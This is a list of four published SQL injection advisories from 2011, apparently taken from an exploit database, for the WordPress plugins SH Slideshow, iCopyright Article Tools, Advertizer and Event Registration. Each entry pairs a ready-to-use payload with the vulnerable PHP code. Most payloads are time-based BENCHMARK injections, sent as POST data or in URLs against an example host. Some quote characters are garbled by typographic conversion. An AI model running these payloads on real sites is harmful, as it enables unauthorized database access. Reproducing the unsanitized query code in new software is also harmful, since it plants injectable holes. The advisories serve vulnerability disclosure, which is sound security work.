
1.WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability # Exploit Title: WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip
# Version: 3.1.4 (tested)
PoC (POST data)
id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20
Vulnerable code
$result = $wpdb->query(‘’delete from sh_slides where id = ‘’.$_POST[‘’id’’]);
2.WordPress iCopyright(R) Article Tools plugin <= 1.1.4 SQL Injection # Exploit Title: WordPress iCopyright(R) Article Tools plugin <= 1.1.4 SQL Injection Vulnerability
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/copyright-licensing-tools.zip
# Version: 1.1.4 (tested)
# Note: magic_quotes has to be turned off


http://www.sh3llc0de.com/wp-content/plugins/copyright-licensing-tools/icopyright_xml.php?id=1’’ AND 1=1–%20
Vulnerable code
$icopyright_post_id = $_GET[‘’id’’]; //requested post id

$response = $wpdb->get_results(“SELECT FROM $posttable JOIN $usertable on $posttable.post_author=$usertable.ID WHERE $posttable.ID = ‘’$icopyright_post_id’’”);
3.WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability # Exploit Title: WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/advertizer.1.0.zip
# Version: 1.0 (tested)
# Note: magic_quotes has to be turned off
PoC (POST data)
id=-1’’ AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20
Vulnerable code
$res = $wpdb->get_row(“SELECT limit_clicks, trace_clicks FROM ".$wpdb-&gt;prefix."adv_v_base WHERE id = ‘’”.$_POST[id].”‘’ limit 1;”);
4.WordPress Event Registration plugin <= 5.4.3 SQL Injection # Exploit Title: WordPress Event Registration plugin <= 5.4.3 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip
# Version: 5.4.3 (tested)
# Note: magic_quotes has to be turned off


http://www.sh3llc0de.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1’’ AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20
Vulnerable code
$id= $_REQUEST[‘’id’’];

$sql = “SELECT
FROM “ . $events_detail_tbl . “ WHERE id=’’$id’’”;
$result = mysql_query($sql);